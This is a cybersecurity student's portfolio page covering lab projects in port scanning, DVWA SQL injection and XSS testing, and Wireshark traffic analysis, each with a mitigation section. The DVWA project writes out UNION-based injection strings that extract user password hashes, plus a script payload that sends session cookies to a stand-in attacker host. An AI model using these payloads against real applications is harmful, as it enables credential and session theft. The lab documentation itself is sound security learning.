Cybersecurity Student | Aspiring Security Analyst
B.Tech Computer Science student with hands-on focus in network security, web application testing, and Linux-based environments. Builds and documents practical security labs using industry-standard tools including Nmap, Wireshark, and Burp Suite.
Actively practices vulnerability identification through CTF challenges and intentionally vulnerable application environments (DVWA, TryHackMe labs). Work is reproducible, documented, and GitHub-hosted.
Target roles: SOC Analyst, Security Analyst, Junior Penetration Tester.
Currently pursuing a B.Tech in Computer Science with a self-directed specialization in cybersecurity. Academic coursework covers data structures, operating systems, computer networks, and cryptography — supplemented by independent lab work that ties theory to practical security scenarios.
The approach is simulation-first: every concept is tested in a controlled lab environment before being documented. This includes spinning up intentionally vulnerable applications, capturing and analyzing live network traffic, and writing Python scripts for task automation and basic security tooling.
Security work is informed by the assumption that understanding attack mechanics is prerequisite to meaningful defense. Labs are designed around real vulnerability classes, not academic abstraction.
Host discovery, port scanning, service enumeration, traffic capture and analysis. Working knowledge of TCP/IP stack behavior, common protocols, and how misconfigurations expose services.
Testing for injection flaws, authentication weaknesses, and client-side vulnerabilities using DVWA and OWASP guidelines. Proficient with Burp Suite for intercepting and modifying HTTP traffic.
Symmetric and asymmetric encryption principles, hashing algorithms, and common misuse patterns (e.g., MD5 for passwords, ECB mode block ciphers). Applied understanding via CTF crypto challenges.
CTF platforms (TryHackMe, PicoCTF), controlled lab environments (Kali Linux, DVWA), hands-on replication of documented CVEs, and structured write-up documentation for every completed exercise.
All projects are conducted in isolated lab environments. No unauthorized scanning or testing. Click each project to expand full methodology.
Network reconnaissance is the first stage of any security assessment. Before an attacker or a defender can evaluate exposure, they need to know which hosts are reachable and which services are listening. Understanding how port scanning works at the socket level — not just as a black-box tool — is foundational for both offensive and defensive roles. Nmap abstracts most of this; building a scanner from scratch exposes the underlying mechanics.
socket.AF_INET, socket.SOCK_STREAM. Set a connection timeout (default 1 second) to prevent indefinite blocking on filtered ports.socket.connect_ex(host, port) — returns 0 if the TCP handshake completes (port open), non-zero on refusal or timeout.socket.recv(1024) to retrieve the service banner. Decode and strip the response.Observation: vsFTPd 2.3.4 is a well-known backdoored version (CVE-2011-2523). The scanner identified it via banner; this finding would trigger targeted follow-up in a real assessment.
Port scanning itself is not an attack — it is observation. The vulnerability is not in the scanning technique but in the services discovered. Running outdated, unpatched services (vsFTPd 2.3.4, OpenSSH 4.7) on network-accessible ports with no access control is the actual exposure. The scanner simply maps what is already visible.
Restrict externally reachable ports to only those required (principle of least exposure). Suppress or modify service banners to remove version information from unauthenticated access. Implement network-level firewall rules (iptables / nftables) to allowlist source IPs for management ports (22, 23, 3306). Update all running services to current supported versions. Monitor for scan traffic using IDS signatures for SYN-only sweep patterns.
Injection vulnerabilities remain consistently in the OWASP Top 3 despite being well-understood and preventable. The gap is not awareness but application: developers often fail to enforce input validation and parameterized queries consistently. Cross-site scripting persists for the same reason — insufficient output encoding. This lab replicates both vulnerability classes from first principles to build a tester's mental model of how they work mechanically.
' (single quote) into the User ID field. Observe MySQL error message — confirms string is interpolated directly into a query.ORDER BY increments (1' ORDER BY 1--, then 2, then 3) until an error occurs. Column count = last successful ordinal.1' UNION SELECT null,database()-- — returns current database name in the output field.1' UNION SELECT table_name,null FROM information_schema.tables WHERE table_schema=database()--1' UNION SELECT user,password FROM users-- — retrieves MD5-hashed passwords. Identify hash type and attempt offline crack using a wordlist.<script>alert('XSS')</script> into the name parameter. Observe whether the script tag is reflected back unencoded and executes in the browser.<script>document.location='http://attacker.local/?c='+document.cookie</script> to demonstrate how an attacker would exfiltrate session tokens.<img src=x onerror=alert(1)> and event-handler injection to demonstrate that blocklisting tag names is insufficient.Both vulnerabilities exist because user-supplied input is treated as trusted data. In SQL injection, the input is concatenated directly into a query string, allowing structural modification of the query logic. In XSS, the input is reflected or stored and then rendered as HTML without encoding, allowing the browser to interpret it as executable code. These are fundamentally the same root cause: inadequate separation of data and instructions.
SQL Injection: Use parameterized queries or prepared statements in all database interactions — never string-concatenate user input into SQL. Apply least-privilege database accounts (application user should not have DROP or schema-access rights). Implement a WAF as a secondary layer, not a primary control.
XSS: HTML-encode all user-supplied output at render time using context-aware encoding (HTML body vs. attribute vs. JavaScript context require different encoders). Implement a strict Content-Security-Policy header to block inline script execution. Set HttpOnly and Secure flags on session cookies to prevent JavaScript access.
Network traffic contains a significant amount of information about system behavior, active sessions, and in some cases, plaintext credentials. SOC analysts and network defenders rely on packet analysis to detect anomalies, investigate incidents, and understand attack timelines. This project builds the skill of reading raw pcap data — identifying protocol structure, filtering for relevant streams, and extracting meaningful forensic artifacts from captured traffic.
host 192.168.56.101 to reduce noise and limit capture to target traffic only.ftp. Locate the USER and PASS commands in the packet list — these transmit in plaintext. Verify username and password are directly visible in the packet payload field.http.request.method == "POST" to isolate form submissions. Right-click a relevant packet → Follow → TCP Stream. View the full HTTP request including POST body containing form field data.tcp.flags.syn==1 && tcp.flags.ack==0 to display SYN-only packets. Observe the pattern: rapid sequential SYN packets to incrementing port numbers from one source IP — characteristic scan signature.telnet. Note that each keypress is transmitted as an individual packet. Use Follow TCP Stream to reconstruct the full session including login credentials and commands entered.Cleartext protocols (FTP, Telnet, HTTP without TLS) expose credentials and session content to any host that can observe the network path — whether that is via ARP poisoning on a local segment, a compromised network device, or an insider position. The data is not hidden; it is simply in transit. This exercise demonstrates that encryption is not an optional enhancement — it is the baseline control for any communication carrying sensitive data.
Replace FTP with SFTP or FTPS; replace Telnet with SSH; enforce HTTPS on all web applications. On internal networks, implement 802.1X port authentication to restrict unauthorized devices from tapping switch segments. Use network monitoring tools (Zeek, Suricata) to alert on cleartext credential patterns and anomalous scan traffic. Disable cleartext management protocols entirely at the device/OS level where feasible.
All project work is hosted publicly on GitHub. Each repository follows a consistent documentation standard so that work is reproducible and reviewable by anyone evaluating this portfolio.
Every project includes the full, commented source code. Python scripts are structured with clear function separation and inline documentation explaining security-relevant logic decisions.
Each repository contains a detailed README covering: setup instructions, tool requirements, execution steps, expected outputs, and a brief explanation of the vulnerability or concept demonstrated.
Terminal output, Wireshark captures, Burp Suite intercepts, and tool results are captured and stored in a dedicated /screenshots directory within each repository.
For each project, a structured write-up in Markdown covers the problem, methodology, findings, and mitigations — formatted for readability and usable as a reference during technical interviews.
Completed CTF challenge write-ups (PicoCTF, TryHackMe) are documented with step-by-step solution breakdowns, covering categories: web, crypto, forensics, and binary exploitation basics.
Virtual machine configurations, network topology diagrams, and tool version details are included so any evaluator can reproduce the exact lab environment used for each project.
Actively completing rooms across tracks: Pre-Security, Jr Penetration Tester, SOC Level 1. Focus on hands-on lab environments rather than video-only content.
Completed challenges in web exploitation, cryptography, and forensics categories. Each solved challenge is documented with a write-up in the GitHub repository.
Working through introductory machines to build familiarity with the HTB platform and enumeration-to-foothold workflow in a more open-ended format than guided rooms.
Local instance used to practice all OWASP Top 10 categories across low, medium, and high security levels. Current status: SQLi, XSS, CSRF, File Inclusion completed.
Intentionally vulnerable Linux VM used as a scanning and exploitation target for port scanner testing, Wireshark analysis, and basic service enumeration exercises.
Daily use of Kali Linux as the primary working environment. Practice includes file permission manipulation, bash scripting, process inspection, and log file analysis.
Self-studying using Professor Messer's free course materials and practice exams. Target exam date: [Month, Year]. Topics covered: threats, vulnerabilities, architecture, implementation, governance.
Structured learning path covering reconnaissance, web application testing, network exploitation, and basic privilege escalation. Current completion: ~60%.
Used as the primary reference for web application testing methodology. Each test case in the DVWA lab maps to a corresponding OTG section.
Technical guide for information security testing — referenced for understanding assessment planning, execution phases, and reporting structure used in professional engagements.
Regularly reviewed to understand real vulnerability disclosures. Practice involves reading CVE descriptions and attempting to understand the technical root cause and exploitation method.
Available for internships, entry-level security roles, and collaborative CTF practice. GitHub is the best place to review work directly. Response time for email inquiries: within 24 hours on weekdays.
Location: Vadodara , Gujarat | Freelance Developer (Python / Web [Frontend , Backend ] ) | Remote | Available Part-Time